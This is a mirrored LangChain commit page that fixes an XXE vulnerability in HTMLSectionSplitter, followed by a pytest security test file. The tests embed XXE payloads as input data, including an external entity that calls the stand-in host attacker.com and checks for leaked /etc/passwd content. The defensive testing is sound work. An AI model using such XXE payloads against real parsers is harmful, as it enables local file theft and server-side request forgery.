mirror of
https://github.com/hwchase17/langchain.git
synced 2025-08-10 21:35:08 +00:00
## Summary - Removes the `xslt_path` parameter from HTMLSectionSplitter to eliminate XXE attack vector - Hardens XML/HTML parsers with secure configurations to prevent XXE attacks - Adds comprehensive security tests to ensure the vulnerability is fixed ## Context This PR addresses a critical XXE vulnerability discovered in the HTMLSectionSplitter component. The vulnerability allowed attackers to: - Read sensitive local files (SSH keys, passwords, configuration files) - Perform Server-Side Request Forgery (SSRF) attacks - Exfiltrate data to attacker-controlled servers ## Changes Made 1. **Removed `xslt_path` parameter** - This eliminates the primary attack vector where users could supply malicious XSLT files 2. **Hardened XML parsers** - Added security configurations to prevent XXE attacks even with the default XSLT: - `no_network=True` - Blocks network access - `resolve_entities=False` - Prevents entity expansion - `load_dtd=False` - Disables DTD processing - `XSLTAccessControl.DENY_ALL` - Blocks all file/network I/O in XSLT transformations 3. **Added security tests** - New test file `test_html_security.py` with comprehensive tests for various XXE attack vectors 4. **Updated existing tests** - Modified tests that were using the removed `xslt_path` parameter ## Test Plan - [x] All existing tests pass - [x] New security tests verify XXE attacks are blocked - [x] Code passes linting and formatting checks - [x] Tested with both old and new versions of lxml Twitter handle: @_colemurray
131 lines
4.8 KiB
Python
131 lines
4.8 KiB
Python
"""Security tests for HTML splitters to prevent XXE attacks."""
|
|
|
|
import pytest
|
|
|
|
from langchain_text_splitters.html import HTMLSectionSplitter
|
|
|
|
|
|
@pytest.mark.requires("lxml", "bs4")
|
|
class TestHTMLSectionSplitterSecurity:
|
|
"""Security tests for HTMLSectionSplitter to ensure XXE prevention."""
|
|
|
|
def test_xxe_entity_attack_blocked(self) -> None:
|
|
"""Test that external entity attacks are blocked."""
|
|
# Create HTML content to process
|
|
html_content = """<html><body><p>Test content</p></body></html>"""
|
|
|
|
# Since xslt_path parameter is removed, this attack vector is eliminated
|
|
# The splitter should use only the default XSLT
|
|
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
|
|
|
|
# Process the HTML - should not contain any external entity content
|
|
result = splitter.split_text(html_content)
|
|
|
|
# Verify that no external entity content is present
|
|
all_content = " ".join([doc.page_content for doc in result])
|
|
assert "root:" not in all_content # /etc/passwd content
|
|
assert "XXE Attack Result" not in all_content
|
|
|
|
def test_xxe_document_function_blocked(self) -> None:
|
|
"""Test that XSLT document() function attacks are blocked."""
|
|
# Even if someone modifies the default XSLT internally,
|
|
# the secure parser configuration should block document() attacks
|
|
|
|
html_content = (
|
|
"""<html><body><h1>Test Header</h1><p>Test content</p></body></html>"""
|
|
)
|
|
|
|
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
|
|
|
|
# Process the HTML safely
|
|
result = splitter.split_text(html_content)
|
|
|
|
# Should process normally without any security issues
|
|
assert len(result) > 0
|
|
assert any("Test content" in doc.page_content for doc in result)
|
|
|
|
def test_secure_parser_configuration(self) -> None:
|
|
"""Test that parsers are configured with security settings."""
|
|
# This test verifies our security hardening is in place
|
|
html_content = """<html><body><h1>Test</h1></body></html>"""
|
|
|
|
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
|
|
|
|
# The convert_possible_tags_to_header method should use secure parsers
|
|
result = splitter.convert_possible_tags_to_header(html_content)
|
|
|
|
# Result should be valid transformed HTML
|
|
assert result is not None
|
|
assert isinstance(result, str)
|
|
|
|
def test_no_network_access(self) -> None:
|
|
"""Test that network access is blocked in parsers."""
|
|
# Create HTML that might trigger network access
|
|
html_with_external_ref = """<?xml version="1.0"?>
|
|
<!DOCTYPE html [
|
|
<!ENTITY external SYSTEM "http://attacker.com/xxe">
|
|
]>
|
|
<html>
|
|
<body>
|
|
<h1>Test</h1>
|
|
<p>&external;</p>
|
|
</body>
|
|
</html>"""
|
|
|
|
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
|
|
|
|
# Process the HTML - should not make network requests
|
|
result = splitter.split_text(html_with_external_ref)
|
|
|
|
# Verify no external content is included
|
|
all_content = " ".join([doc.page_content for doc in result])
|
|
assert "attacker.com" not in all_content
|
|
|
|
def test_dtd_processing_disabled(self) -> None:
|
|
"""Test that DTD processing is disabled."""
|
|
# HTML with DTD that attempts to define entities
|
|
html_with_dtd = """<!DOCTYPE html [
|
|
<!ELEMENT html (body)>
|
|
<!ELEMENT body (h1, p)>
|
|
<!ELEMENT h1 (#PCDATA)>
|
|
<!ELEMENT p (#PCDATA)>
|
|
<!ENTITY test "This is a test entity">
|
|
]>
|
|
<html>
|
|
<body>
|
|
<h1>Header</h1>
|
|
<p>&test;</p>
|
|
</body>
|
|
</html>"""
|
|
|
|
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
|
|
|
|
# Process the HTML - entities should not be resolved
|
|
result = splitter.split_text(html_with_dtd)
|
|
|
|
# The entity should not be expanded
|
|
all_content = " ".join([doc.page_content for doc in result])
|
|
assert "This is a test entity" not in all_content
|
|
|
|
def test_safe_default_xslt_usage(self) -> None:
|
|
"""Test that the default XSLT file is used safely."""
|
|
# Test with HTML that has font-size styling (what the default XSLT handles)
|
|
html_with_font_size = """<html>
|
|
<body>
|
|
<span style="font-size: 24px;">Large Header</span>
|
|
<p>Content under large text</p>
|
|
<span style="font-size: 18px;">Small Header</span>
|
|
<p>Content under small text</p>
|
|
</body>
|
|
</html>"""
|
|
|
|
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
|
|
|
|
# Process the HTML using the default XSLT
|
|
result = splitter.split_text(html_with_font_size)
|
|
|
|
# Should successfully process the content
|
|
assert len(result) > 0
|
|
# Large font text should be converted to header
|
|
assert any("Large Header" in str(doc.metadata.values()) for doc in result)
|